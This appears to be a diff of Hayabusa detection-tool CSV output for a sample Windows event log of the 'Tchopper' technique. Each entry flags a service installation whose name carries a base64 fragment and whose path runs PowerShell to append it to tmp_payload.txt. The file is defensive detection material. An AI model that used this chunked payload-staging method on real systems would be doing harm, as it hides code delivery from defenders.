+2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
